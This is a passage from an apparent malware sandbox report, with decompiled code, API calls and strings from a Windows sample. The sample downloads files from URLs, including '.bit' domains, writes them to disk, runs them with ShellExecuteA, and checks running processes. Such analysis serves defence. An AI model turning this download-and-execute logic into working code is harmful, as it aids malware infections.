				 *(_t336 + 0x10) = 0;
				 *_t336 = 0;
				E00413FF0(_t324, _t336,  &_a172, 0);
				_a10476 = 1;
				E0040ECB0( &_a44);
				_t325 = _a48;
				_t396 = _t395 + 0x30;
				_t221 = (0x2aaaaaab * (_t325 - _a44) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t325 - _a44) >> 0x20 >> 2);
				_a36 = _t221;
				if(_t221 == 0) {
					L76:
					_t377 = _a64;
					if(_t377 == 0) {
						L82:
						if(_a200 >= 0x10) {
							L00422587(_a180);
						}
						 *[fs:0x0] = _a10488;
						return 0;
					}
					_t384 = _t377;
					if(_t377 == _t325) {
						L81:
						L00422587(_t377);
						_t396 = _t396 + 4;
						goto L82;
					} else {
						goto L78;
					}
					do {
						L78:
						if( *(_t384 + 0x14) >= 0x10) {
							L00422587( *_t384);
							_t396 = _t396 + 4;
						}
						 *(_t384 + 0x14) = 0xf;
						 *(_t384 + 0x10) = 0;
						 *_t384 = 0;
						_t384 = _t384 + 0x18;
					} while (_t384 != _t325);
					goto L81;
				}
				_t227 = GetProcAddress(LoadLibraryW(L"Shell32.dll"), "SHGetFolderPathA");
				E00413C40(_t325,  &_a168, _t376, 0x400);
				_a10492 = 3;
				_t327 = _a164;
				 *_t227(0, 0x1c, 0, 0, _t327); // executed
				__imp__UuidCreate( &_a204);
				_a32 = 0;
				__imp__UuidToStringA( &_a200,  &_a32);
				_t369 = _a24;
				_a100 = 0xf;
				_a96 = 0;
				_a80 = 0;
				if( *_t369 != 0) {
					_t342 = _t369;
					_t39 = _t342 + 1; // 0x1
					_t386 = _t39;
					do {
						_t233 =  *_t342;
						_t342 = _t342 + 1;
					} while (_t233 != 0);
					_t343 = _t342 - _t386;
					goto L6;
				} else {
					_t343 = 0;
					L6:
					E004156D0(_t327,  &_a84, _t376, _t369);
					_a10456 = 4;
					__imp__RpcStringFreeA( &_a20, _t343);
					_t237 =  >=  ? _a72 :  &_a72;
					PathAppendA(_t327,  >=  ? _a72 :  &_a72);
					CreateDirectoryA(_t327, 0); // executed
					_push(_v44);
					_a64 = 0xf;
					_a60 = 0;
					_a44 = 0;
					E004184E0( &_a44, _t327, _a124);
					_t398 = _t396 - 0x18;
					_a10436 = 5;
					_t346 = _t398;
					_v81 = 0;
					_push(0xffffffff);
					 *(_t346 + 0x14) = 0xf;
					 *(_t346 + 0x10) = 0;
					 *_t346 = 0;
					E00413FF0(_t327, _t346,  &_a32, 0);
					_t243 = E00412900( &_a72, _v93);
					_t396 = _t398 + 0x18;
					_a10424 = 6;
					E00413580(_t327, _t376 + 0x880, _t243);
					_a10420 = 5;
					if(_a88 >= 8) {
						L00422587(_a92);
						_t396 = _t396 + 4;
					}
					if(_a4 <= 0) {
						L69:
						if(_a60 >= 0x10) {
							L00422587(_a40);
							_t396 = _t396 + 4;
						}
						_a60 = 0xf;
						_a56 = 0;
						_a40 = 0;
						if(_a84 >= 0x10) {
							L00422587(_a64);
							_t396 = _t396 + 4;
						}
						_a84 = 0xf;
						_a80 = 0;
						_a64 = 0;
						if(_t327 != 0) {
							L00422587(_t327);
							_t396 = _t396 + 4;
						}
						_t325 = _a16;
						goto L76;
					} else {
						_t387 = _a12;
						_v80 = _t387;
						do {
							_t248 = E00414300(_t387, "$run", 0, 4);
							if(_t248 != 0xffffffff) {
								if( *((intOrPtr*)(_t387 + 0x14)) < 0x10) {
									_t366 = _t387;
								} else {
									_t366 =  *_t387;
								}
								 *((char*)(_t366 + _t248)) = 0;
							}
							_a192 = 0;
							E0042B420( &_a193, 0, 0x27ff);
							_t251 = InternetOpenA("Microsoft Internet Explorer", 0, 0, 0, 0);
							_t400 = _t396 + 0xc - 0x18;
							_t379 = _t251;
							_t350 = _t400;
							_v68 = _t379;
							_push(0xffffffff);
							 *(_t350 + 0x14) = 0xf;
							 *(_t350 + 0x10) = 0;
							 *_t350 = 0;
							E00413FF0(0, _t350, _t387, 0);
							E00412900( &_v76, 0);
							_a10412 = 7;
							_push(L".bit/");
							_t255 =  >=  ? _v76 :  &_v76;
							_push( >=  ? _v76 :  &_v76);
							_t256 = E00421C02( &_v76);
							_t401 = _t400 + 0x20;
							if(_t256 != 0) {
								_t404 = _t401 - 0x18;
								_t364 = _t404;
								_push(0xffffffff);
								 *(_t364 + 0x14) = 7;
								 *(_t364 + 0x10) = 0;
								 *_t364 = 0;
								E00414690(0, _t364,  &_v68, 0);
								_t391 = E0040DD40( &_a56);
								_t401 = _t404 + 0x18;
								if( &_v80 != _t391) {
									if(_v52 >= 8) {
										L00422587(_v72);
										_t401 = _t401 + 4;
									}
									_v52 = 7;
									_v56 = 0;
									_v72 = 0;
									if(_t391[5] >= 8) {
										_v72 =  *_t391;
										 *_t391 = 0;
									} else {
										_t318 = _t391[4] + 1;
										if(_t391[4] + 1 != 0) {
											E004205A0( &_v72, _t391, _t318 + _t318);
											_t401 = _t401 + 0xc;
										}
									}
									_v56 = _t391[4];
									_v52 = _t391[5];
									_t391[5] = 7;
									_t391[4] = 0;
									 *_t391 = 0;
								}
								if(_a84 >= 8) {
									L00422587(_a64);
									_t401 = _t401 + 4;
								}
								_t387 = _v108;
							}
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_t402 = _t401 - 0x18;
							_t352 = _t402;
							_push(0xffffffff);
							 *(_t352 + 0x14) = 7;
							 *(_t352 + 0x10) = 0;
							 *_t352 = 0;
							E00414690(0, _t352,  &_v68, 0);
							_t260 = E00412840( &_a56, 0);
							_t396 = _t402 + 0x18;
							if(_t260[0x14] >= 0x10) {
								_t260 =  *_t260;
							}
							_t261 = InternetOpenUrlA(_t379, _t260, ??, ??, ??, ??); // executed
							_t380 = _t261;
							if(_a60 >= 0x10) {
								L00422587(_a40);
								_t396 = _t396 + 4;
							}
							_a60 = 0xf;
							_a56 = 0;
							_a40 = 0;
							if(_t380 != 0) {
								_v28 = 0;
								_a36 = 4;
								HttpQueryInfoW(_t380, 0x20000013,  &_v28,  &_a36, 0);
								if(_v48 >= 0x12c) {
									goto L32;
								}
								_push(0xffffffff);
								_v124 = 0xf;
								_v128 = 0;
								_v144 = 0;
								E00413FF0(0,  &_v144, _t387, 0);
								_push(1);
								_t403 = _t396 - 8;
								_a10360 = 8;
								_t267 = E0041E5B0( &_v156, 0);
								_t373 = _v152;
								if(_t267 == _t373 - 1) {
									_t304 =  >=  ? _v148 :  &_v148;
									( >=  ? _v148 :  &_v148)[_t373 - 1] = 0;
								}
								_push(1);
								_t396 = _t403 - 8;
								_t271 = E00413010( &_v160,  &_a64, E0041E5B0( &_v148, _t373) + 1, 0xffffffff);
								_t388 = _t271;
								if( &_v172 != _t271) {
									if(_v128 >= 0x10) {
										L00422587(_v148);
										_t396 = _t396 + 4;
									}
									_v128 = 0xf;
									_v132 = 0;
									_v148 = 0;
									E00413D40( &_v148, _t388);
								}
								if(_a96 >= 0x10) {
									L00422587(_a76);
									_t396 = _t396 + 4;
								}
								_v76 = 0xf;
								_v80 = 0;
								_v96 = 0;
								_a10368 = 9;
								_t389 = _a40;
								_t274 =  >=  ? _v36 :  &_v36;
								lstrcpyA(_t389,  >=  ? _v36 :  &_v36);
								_t277 =  >=  ? _v148 :  &_v148;
								PathAppendA(_t389,  >=  ? _v148 :  &_v148);
								if( *_t389 != 0) {
									_t359 = _t389;
									_t374 =  &(_t359[1]);
									do {
										_t279 =  *_t359;
										_t359 =  &(_t359[1]);
									} while (_t279 != 0);
									_t360 = _t359 - _t374;
									goto L48;
								} else {
									_t360 = 0;
									L48:
									_push(_t360);
									E004156D0(0,  &_v100, _t380, _t389);
									_t282 =  >=  ? _v108 :  &_v108;
									_t283 = CreateFileA( >=  ? _v108 :  &_v108, 0x40000000, 1, 0, 2, 0x80, 0); // executed
									_t390 = _t283;
									if(_t390 == 0xffffffff) {
										L60:
										if(_v84 >= 0x10) {
											L00422587(_v104);
											_t396 = _t396 + 4;
										}
										_v84 = 0xf;
										_v88 = 0;
										_v104 = 0;
										if(_v136 >= 0x10) {
											L00422587(_v156);
											_t396 = _t396 + 4;
										}
										_a10360 = 5;
										_v156 = 0;
										_v140 = 0;
										_v136 = 0xf;
										if(_v108 >= 8) {
											L00422587(_v128);
											_t396 = _t396 + 4;
										}
										_t387 = _v164;
										goto L67;
									}
									_t287 = SetFilePointer(_t390, 0, 0, 0); // executed
									if(_t287 == 0xffffffff) {
										goto L60;
									}
									_t331 = 0;
									while(1) {
										_t290 = InternetReadFile(_t380,  &_a108, 0x2800,  &_v52); // executed
										if(_t290 == 0) {
											break;
										}
										_t297 = _v68;
										if(_t297 == 0) {
											break;
										}
										_v64 = 0;
										_t299 = WriteFile(_t390,  &_a92, _t297,  &_v64, 0); // executed
										if(_t299 == 0) {
											L57:
											CloseHandle(_t390);
											InternetCloseHandle(_t380); // executed
											InternetCloseHandle(_v152);
											if(_t331 != 0 && _t331 == 0) {
												_t295 =  >=  ? _v128 :  &_v128;
												ShellExecuteA(0, 0,  >=  ? _v128 :  &_v128, 0, 0, 1); // executed
											}
											goto L60;
										}
										if(_v68 == 0x2800) {
											continue;
										}
										goto L57;
									}
									_t331 = 1;
									goto L57;
								}
							} else {
								L32:
								_a10372 = 5;
								if(_v96 >= 8) {
									L00422587(_v116);
									_t396 = _t396 + 4;
								}
							}
							L67:
							_t387 = _t387 + 0x18;
							_t186 =  &_v68;
							 *_t186 = _v68 - 1;
							_v152 = _t387;
						} while ( *_t186 != 0);
						_t327 = _a44;
						goto L69;
					}
				}
			}

0x0041dbd3
0x0041dbd6
0x0041dbd8
0x0041dbe3
0x0041dbe4
0x0041dbeb
0x0041dbf1
0x0041dbf6
0x0041dbf9
0x0041dc03
0x0041dc07
0x0041dc18
0x0041dc24
0x0041dc2c
0x0041dc31
0x0041dc3c
0x0041dc44
0x0041dc4c
0x0041dc54
0x0041dc57
0x0041dc5f
0x0041dc61
0x0041dc65
0x0041dc67
0x0041dc6e
0x0041dc7a
0x0041dc7d
0x0041dc82
0x0041dc85
0x0041dc8d
0x0041dc96
0x0041dc9a
0x0041dca1
0x0041dca9
0x0041dcac
0x0041dcb8
0x0041dcc0
0x0041dcc5
0x0041dcd3
0x0041dce4
0x0041dce6
0x0041dcea
0x0041e459
0x0041e459
0x0041e45f
0x0041e498
0x0041e4a0
0x0041e4a9
0x0041e4ae
0x0041e4bc
0x0041e4c7
0x0041e4c7
0x0041e461
0x0041e465
0x0041e48f
0x0041e490
0x0041e495
0x00000000
0x00000000
0x00000000
0x00000000
0x0041e467
0x0041e467
0x0041e46b
0x0041e46f
0x0041e474
0x0041e474
0x0041e477
0x0041e47e
0x0041e485
0x0041e488
0x0041e48b
0x00000000
0x0041e467
0x0041dd01
0x0041dd15
0x0041dd1a
0x0041dd22
0x0041dd32
0x0041dd3c
0x0041dd46
0x0041dd57
0x0041dd5d
0x0041dd61
0x0041dd6c
0x0041dd77
0x0041dd82
0x0041dd88
0x0041dd8a
0x0041dd8a
0x0041dd90
0x0041dd90
0x0041dd92
0x0041dd93
0x0041dd97
0x00000000
0x0041dd84
0x0041dd84
0x0041dd99
0x0041dda2
0x0041ddab
0x0041ddb4
0x0041ddc9
0x0041ddd3
0x0041dddc
0x0041dde2
0x0041dded
0x0041ddff
0x0041de0b
0x0041de13
0x0041de18
0x0041de1b
0x0041de23
0x0041de25
0x0041de31
0x0041de35
0x0041de3c
0x0041de44
0x0041de47
0x0041de57
0x0041de5c
0x0041de66
0x0041de6e
0x0041de73
0x0041de83
0x0041de8c
0x0041de91
0x0041de91
0x0041de99
0x0041e3da
0x0041e3e2
0x0041e3eb
0x0041e3f0
0x0041e3f0
0x0041e3fb
0x0041e406
0x0041e411
0x0041e419
0x0041e422
0x0041e427
0x0041e427
0x0041e42a
0x0041e435
0x0041e440
0x0041e44a
0x0041e44d
0x0041e452
0x0041e452
0x0041e455
0x00000000
0x0041de9f
0x0041de9f
0x0041dea3
0x0041dea7
0x0041deb4
0x0041debc
0x0041dec2
0x0041dec8
0x0041dec4
0x0041dec4
0x0041dec4
0x0041deca
0x0041dece
0x0041dedc
0x0041dee7
0x0041defc
0x0041df02
0x0041df05
0x0041df07
0x0041df09
0x0041df0f
0x0041df13
0x0041df1a
0x0041df22
0x0041df24
0x0041df2f
0x0041df34
0x0041df45
0x0041df4a
0x0041df4f
0x0041df50
0x0041df55
0x0041df5a
0x0041df60
0x0041df65
0x0041df67
0x0041df69
0x0041df70
0x0041df78
0x0041df80
0x0041df91
0x0041df93
0x0041df9c
0x0041dfa3
0x0041dfa9
0x0041dfae
0x0041dfae
0x0041dfb3
0x0041dfbb
0x0041dfc3
0x0041dfcc
0x0041dfe9
0x0041dfed
0x0041dfce
0x0041dfd1
0x0041dfd2
0x0041dfdd
0x0041dfe2
0x0041dfe2
0x0041dfd2
0x0041dff6
0x0041dffd
0x0041e003
0x0041e00a
0x0041e011
0x0041e011
0x0041e01c
0x0041e025
0x0041e02a
0x0041e02a
0x0041e02d
0x0041e02d
0x0041e031
0x0041e033
0x0041e035
0x0041e037
0x0041e039
0x0041e03e
0x0041e042
0x0041e044
0x0041e04b
0x0041e053
0x0041e05b
0x0041e069
0x0041e06e
0x0041e075
0x0041e077
0x0041e077
0x0041e07b
0x0041e089
0x0041e08b
0x0041e094
0x0041e099
0x0041e099
0x0041e09c
0x0041e0a7
0x0041e0b2
0x0041e0bc
0x0041e0eb
0x0041e0fb
0x0041e10d
0x0041e11b
0x00000000
0x00000000
0x0041e11d
0x0041e126
0x0041e12e
0x0041e136
0x0041e13b
0x0041e140
0x0041e142
0x0041e145
0x0041e151
0x0041e156
0x0041e15f
0x0041e16a
0x0041e16f
0x0041e16f
0x0041e174
0x0041e176
0x0041e192
0x0041e197
0x0041e19f
0x0041e1a6
0x0041e1ac
0x0041e1b1
0x0041e1b1
0x0041e1b9
0x0041e1c1
0x0041e1c9
0x0041e1ce
0x0041e1ce
0x0041e1db
0x0041e1e4
0x0041e1e9
0x0041e1e9
0x0041e1ec
0x0041e1f4
0x0041e1fc
0x0041e201
0x0041e218
0x0041e21f
0x0041e229
0x0041e238
0x0041e23f
0x0041e248
0x0041e24e
0x0041e250
0x0041e253
0x0041e253
0x0041e255
0x0041e256
0x0041e25a
0x00000000
0x0041e24a
0x0041e24a
0x0041e25c
0x0041e25c
0x0041e262
0x0041e272
0x0041e288
0x0041e28e
0x0041e293
0x0041e353
0x0041e358
0x0041e35e
0x0041e363
0x0041e363
0x0041e36b
0x0041e373
0x0041e37b
0x0041e380
0x0041e386
0x0041e38b
0x0041e38b
0x0041e38e
0x0041e39b
0x0041e3a0
0x0041e3a8
0x0041e3b0
0x0041e3b6
0x0041e3bb
0x0041e3bb
0x0041e3be
0x00000000
0x0041e3be
0x0041e2a0
0x0041e2a9
0x00000000
0x00000000
0x0041e2af
0x0041e2b1
0x0041e2c7
0x0041e2cf
0x00000000
0x00000000
0x0041e2d1
0x0041e2da
0x00000000
0x00000000
0x0041e2e5
0x0041e2fb
0x0041e303
0x0041e316
0x0041e317
0x0041e324
0x0041e32a
0x0041e32e
0x0041e33f
0x0041e34d
0x0041e34d
0x00000000
0x0041e32e
0x0041e310
0x00000000
0x00000000
0x00000000
0x0041e312
0x0041e314
0x00000000
0x0041e314
0x0041e0be
0x0041e0be
0x0041e0be
0x0041e0cb
0x0041e0d5
0x0041e0da
0x0041e0da
0x0041e0cb
0x0041e3c2
0x0041e3c2
0x0041e3c5
0x0041e3c5
0x0041e3c9
0x0041e3c9
0x0041e3d3
0x00000000
0x0041e3d3
0x0041de99

APIs

Part of subcall function 0040ECB0: _strtok.LIBCMT ref: 0040ED66

LoadLibraryW.KERNEL32(Shell32.dll), ref: 0041DCF5
GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 0041DD01

Part of subcall function 00413C40: _memset.LIBCMT ref: 00413C83

UuidCreate.RPCRT4 ref: 0041DD3C
UuidToStringA.RPCRT4 ref: 0041DD57
RpcStringFreeA.RPCRT4 ref: 0041DDB4
PathAppendA.SHLWAPI(?,00000000), ref: 0041DDD3
CreateDirectoryA.KERNEL32(?,00000000), ref: 0041DDDC
_memset.LIBCMT ref: 0041DEE7
InternetOpenA.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0041DEFC

Part of subcall function 00412900: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00412966

_wcsstr.LIBCMT ref: 0041DF50
InternetOpenUrlA.WININET(00000000,00000000), ref: 0041E07B

Part of subcall function 0040DD40: _wcsstr.LIBCMT ref: 0040DD8D
Part of subcall function 0040DD40: _wcsstr.LIBCMT ref: 0040DDB6
Part of subcall function 0040DD40: _memset.LIBCMT ref: 0040DDE4
Part of subcall function 0040DD40: lstrlenW.KERNEL32(?), ref: 0040DE0A
Part of subcall function 0040DD40: gethostbyname.WS2_32(00500134), ref: 0040DEA7

_memmove.LIBCMT ref: 0041DFDD
HttpQueryInfoW.WININET(00000000,20000013,?,00000000,00000000), ref: 0041E10D
lstrcpyA.KERNEL32(?,?), ref: 0041E229
PathAppendA.SHLWAPI(?,?), ref: 0041E23F
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 0041E288
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041E2A0
InternetReadFile.WININET(00000000,?,00002800,?), ref: 0041E2C7
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0041E2FB
CloseHandle.KERNEL32(00000000), ref: 0041E317
InternetCloseHandle.WININET(00000000), ref: 0041E324
InternetCloseHandle.WININET(?), ref: 0041E32A
ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0041E34D

Strings

Shell32.dll, xrefs: 0041DCF0
Microsoft Internet Explorer, xrefs: 0041DEF7
SHGetFolderPathA, xrefs: 0041DCFB
$run, xrefs: 0041DEAB
.bit/, xrefs: 0041DF45

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseCreateHandle_memset_wcsstr$AppendOpenPathStringUuid$AddressByteCharDirectoryExecuteFreeHttpInfoLibraryLoadMultiPointerProcQueryReadShellWideWrite_memmove_strtokgethostbynamelstrcpylstrlen
String ID: $run$.bit/$Microsoft Internet Explorer$SHGetFolderPathA$Shell32.dll
API String ID: 1843630811-800396732
Opcode ID: 8805aa23c8f06e2355e9efc098d818631f16528f51d5ec94224153029524bdf8
Instruction ID: dcf8a581e05b5da13000ef7a953c2c15a8b95d2250363c4482f8ef8be3b44f4c
Opcode Fuzzy Hash: 8805aa23c8f06e2355e9efc098d818631f16528f51d5ec94224153029524bdf8
Instruction Fuzzy Hash: BF32C070108380EFE730DF25C845B9BBBE4AF85308F10491EF99957291D7BA9589CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 00412220 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00412220() {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				unsigned int _v20;
				unsigned int _v24;
				WCHAR* _v28;
				int _v32;
				char _v36;
				char _v2084;
				char _v43044;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t37;
				void* _t38;
				unsigned int _t40;
				void* _t50;
				struct HINSTANCE__* _t52;
				int _t56;
				signed int _t61;
				struct HINSTANCE__* _t62;
				void* _t63;
				struct HINSTANCE__* _t64;
				void* _t65;
				void* _t66;

				E0042F7C0(0xa820);
				_t56 = 0;
				_v32 = 0;
				_v28 = PathFindFileNameW( *(CommandLineToArgvW(GetCommandLineW(),  &_v32)));
				_t62 = LoadLibraryW(L"kernel32.dll");
				_v8 = GetProcAddress(_t62, "EnumProcesses");
				_v12 = GetProcAddress(_t62, "EnumProcessModules");
				_v16 = GetProcAddress(_t62, "GetModuleBaseNameW");
				_t37 = _v8;
				if(_t37 == 0) {
					_t52 = LoadLibraryW(L"Psapi.dll"); // executed
					_t64 = _t52;
					_v8 = GetProcAddress(_t64, "EnumProcesses");
					_v12 = GetProcAddress(_t64, "EnumProcessModules");
					_v16 = GetProcAddress(_t64, "GetModuleBaseNameW");
					_t37 = _v8;
				}
				_t38 =  *_t37( &_v43044, 0xa000,  &_v20); // executed
				if(_t38 != 0) {
					_t61 = 0;
					_t40 = _v20 >> 2;
					_v24 = _t40;
					if(_t40 != 0) {
						do {
							_t63 = OpenProcess(0x410, 0,  *(_t65 + _t61 * 4 - 0xa820));
							if(_t63 != 0) {
								_push( &_v36);
								_push(4);
								_push( &_v8);
								_push(_t63); // executed
								if(_v12() != 0) {
									_v16(_t63, _v8,  &_v2084, 0x400);
									_t50 = E00420235(_t56, _t61, _t63,  &_v2084, _v28);
									_t66 = _t66 + 8;
									if(_t50 == 0) {
										_t56 = _t56 + 1;
									}
								}
							}
							CloseHandle(_t63);
							_t61 = _t61 + 1;
						} while (_t61 < _v24);
					}
					return _t56;
				} else {
					return 1;
				}
			}

APIs

GetCommandLineW.KERNEL32 ref: 00412235
CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
CloseHandle.KERNEL32(00000000), ref: 00412347

Strings

EnumProcesses, xrefs: 00412264, 00412299
EnumProcessModules, xrefs: 0041226C, 004122A1
GetModuleBaseNameW, xrefs: 00412277, 004122AC
kernel32.dll, xrefs: 0041224E
Psapi.dll, xrefs: 0041228C

Memory Dump Source

Source File: 00000008.00000002.627888842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.628261003.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628304859.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.628317747.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_Q5W0I0pzFI.jbxd

Yara matches

Similarity

API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
API String ID: 3668891214-3807497772
Opcode ID: 2a8a9dd9818d9c7303d75e32746d1d8df15d61a28851d0a93ed3ef8fb498139a
Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
Opcode Fuzzy Hash: 2a8a9dd9818d9c7303d75e32746d1d8df15d61a28851d0a93ed3ef8fb498139a
Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041F130 Relevance: 21.7, APIs: 11, Strings: 1, Instructions: 689
sleeptimewindowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0041F130(struct HWND__** _a4) {
				int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				short* _v28;
				short* _v32;
				struct HWND__** _v36;
				struct HWND__** _v40;
				int _v48;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				int _v68;
				int _v72;
				int _v76;
				int _v80;
				int _v84;
				int _v88;
				int _v92;
				int _v96;
				int _v100;
				int _v104;
				struct tagMSG _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t246;
				int _t274;
				intOrPtr _t284;
				struct HWND__** _t292;
				struct HWND__** _t299;
				int _t316;
				struct HWND__** _t319;
				int _t320;
				intOrPtr _t338;
				int _t344;
				int _t346;
				intOrPtr _t356;
				int _t359;
				void* _t360;
				struct HWND__** _t366;
				void* _t370;
				void* _t371;
				void* _t372;
				int _t373;
				int _t374;
				void* _t378;
				void* _t380;
				short* _t382;
				short* _t389;
				intOrPtr* _t395;
				signed int _t397;
				struct HWND__** _t402;
				short* _t403;
				struct HWND__** _t406;
				short* _t407;
				intOrPtr* _t409;
				signed int _t411;
				intOrPtr* _t416;
				signed int _t418;
				short* _t434;
				short* _t439;
				short* _t441;
				intOrPtr* _t443;
				intOrPtr* _t445;
				signed int _t449;
				struct HWND__** _t450;
				void* _t451;
				short* _t452;
				short* _t456;
				short* _t458;
				short* _t459;
				intOrPtr* _t463;
				short* _t465;
				intOrPtr* _t466;
				short* _t467;
				struct HWND__** _t468;
				short* _t469;
				short* _t470;
				short* _t471;
				short* _t472;
				short* _t473;
				short* _t474;
				intOrPtr _t475;
				intOrPtr _t476;
				void* _t477;
				short* _t478;
				void* _t479;
				short* _t481;
				void* _t482;
				short* _t483;
				short* _t484;
				short* _t485;
				short* _t486;
				short* _t487;

				_push(0xffffffff);
				_push(E004CB446);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t475;
				_t476 = _t475 - 0x8c;
				_t366 = _a4;
				_v20 = _t476;
				_v40 = _t366;
				_t366[1] = 1;
				E00423F74(timeGetTime());
				_v8 = 0;
				_t477 = _t476 + 4;
				Sleep(_t366[0x231] * 0x3e8); // executed
				_t246 = _t366[0x230];
				if(_t246 == 0xffffffff) {
					L124:
					 *[fs:0x0] = _v16;
					return 0;
				}
				Sleep(_t246 * 0x3e8); // executed
				_v68 = 0;
				_v64 = 0;
				_v60 = 0;
				if(_t366[0x238] == 0) {
					_v8 = 8;
					_push( &_v68);
					_t478 = _t477 - 0x18;
					_t382 = _t478;
					_push(0xffffffff);
					 *((intOrPtr*)(_t382 + 0x14)) = 7;
					 *(_t382 + 0x10) = 0;
					 *_t382 = 0;
					E00414690(_t366, _t382,  &(_t366[0x229]), 0);
					E00410160(_t366,  &(_t366[0x220]));
					_t463 = _v68;
					_t479 = _t478 + 0x1c;
					while(_t463 != _v64) {
						if( *((intOrPtr*)(_t463 + 0x14)) < 8) {
							E004111C0(_t366, _t463);
							E00411AB0();
							_t463 = _t463 + 0x18;
						} else {
							E004111C0(_t366,  *_t463);
							E00411AB0();
							_t463 = _t463 + 0x18;
						}
					}
					_t366[1] = 0;
					SendMessageW( *_t366, 0x8003, 0, 0);
					_t255 = _v68;
					if(_v68 == 0) {
						goto L124;
					}
					E00414F10(_t255, _v64);
					_push(_v68);
					L123:
					L00422587();
					goto L124;
				}
				_v8 = 1;
				E00410A50( &_v68); // executed
				_t464 = _v68;
				_t449 = 0;
				_t370 = (0x2aaaaaab * (_v64 - _t464) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v64 - _t464) >> 0x20 >> 2);
				if(_t370 == 0) {
					L11:
					_v56 = 0;
					_v52 = 0;
					_v48 = 0;
					_t450 = _a4;
					_push(0);
					_push( &_v56);
					_t481 = _t477 - 0x18;
					_v8 = 2;
					_t389 = _t481;
					_push(3);
					 *((intOrPtr*)(_t389 + 0x14)) = 7;
					 *(_t389 + 0x10) = 0;
					 *_t389 = 0;
					E00415C10(_t370, _t389, _t450, _t464, "C:\");
					E0040F730(_t450, _t450 + 0x880); // executed
					_t371 = _v52;
					_t482 = _t481 + 0x20;
					_t465 = _v56;
					_v24 = 1;
					_v28 = _t371;
					_v32 = _t465;
					while(((0x92492493 * (_t371 - _t465) >> 0x20) + _t371 - _t465 >> 4 >> 0x1f) + ((0x92492493 * (_t371 - _t465) >> 0x20) + _t371 - _t465 >> 4) != 0) {
						_v80 = 0;
						_v76 = 0;
						_v72 = 0;
						_v8 = 3;
						while(_t465 != _t371) {
							if( *((char*)(_t465 + 0x18)) != 0) {
								L26:
								_t465 = _t465 + 0x1c;
								continue;
							}
							_push(0);
							_t379 = _t450 + 0x880;
							_push( &_v80);
							_v36 = _t450 + 0x880;
							if( *((intOrPtr*)(_t465 + 0x14)) < 8) {
								_t445 = _t465;
							} else {
								_t445 =  *_t465;
							}
							_t487 = _t482 - 0x18;
							_t459 = _t487;
							 *((intOrPtr*)(_t459 + 0x14)) = 7;
							 *(_t459 + 0x10) = 0;
							 *_t459 = 0;
							if( *_t445 != 0) {
								_t416 = _t445;
								_t59 = _t416 + 2; // 0x2
								_t380 = _t59;
								do {
									_t356 =  *_t416;
									_t416 = _t416 + 2;
								} while (_t356 != 0);
								_t379 = _v36;
								_t418 = _t416 - _t380 >> 1;
								goto L25;
							} else {
								_t418 = 0;
								L25:
								_push(_t418);
								E00415C10(_t379, _t459, _t459, _t465, _t445);
								_t450 = _a4;
